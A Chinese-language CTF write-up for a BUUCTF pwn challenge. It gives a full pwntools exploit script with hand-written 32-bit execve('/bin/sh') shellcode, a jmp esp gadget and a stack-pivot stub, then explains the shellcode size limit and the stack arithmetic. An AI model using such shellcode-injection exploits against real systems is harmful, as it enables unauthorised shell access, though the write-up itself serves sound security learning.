EXP:
from pwn import*
p=remote('node4.buuoj.cn',28624)
jmp_esp=0x8048554
shellcode_=asm("xor ecx,ecx;xor edx,edx;push edx;
#传递”/sh”,为了4字节对齐,使用//sh,这在execve()中等同于/sh
push 0x68732f2f;push 0x6e69622f;mov ebx,esp;mov eax,0xb;int 0x80")
p1=shellcode_.ljust(0x24,b'\x00')+p32(jmp_esp)+asm("sub esp,0x28;jmp esp;")#asm直接发送了无需对其p32,,,,,为何?????
p.send(p1)
p.interactive()
首先简单复习下程序:
保护全关。程序逻辑简单,就一个pwn函数还有一个“hint”函数( __asm { jmp esp })里面就一条这个语句,将esp所指向的栈作为指令开始执行。显然采用shellcode注入法。 但是读入字节数有限,32位下用shellcraft.sh()产生的有44个字节。于是我们自己写shellcode:
shellcode_=asm("xor ecx,ecx;xor edx,edx;push edx;push 0x68732f2f;push 0x6e69622f;mov ebx,esp;mov eax,0xb;int 0x80")
上述汇编代码很简单,就是设置寄存器的值调用execve执行“/bin/sh\x00”
这里笔者发现“/bin/sh\x00”传入栈中的传法比较奇怪。分析得出一个结论:
关于字符串如何入栈:
首先将每个字符串转为一个字节的ascii码,如b转为“0x62”,
再将字符串中单个字符一个一个从右到左的顺序依次压入栈中。
但是32位“/bin/sh\x00”比较离谱,push edx;push 0x68732f2f;push 0x6e69622f;
这里将0单独压入栈中,“//sh”作为和“/sh”相同的执行效果再压入栈中。
至于64位的shellcode,后边再说。
这里解释一下exp中的
asm("sub esp,0x28;jmp esp;")
为什么是将esp降低0x28呢:首先我们需要明确一点:esp指向栈顶,意思是esp存了栈顶的地址,所以IDA中这条语句:
“.text:08048554 jmp esp”意思是将esp存的值赋值给eip,这里esp并没有因为执行这条jmp语句而降低地址。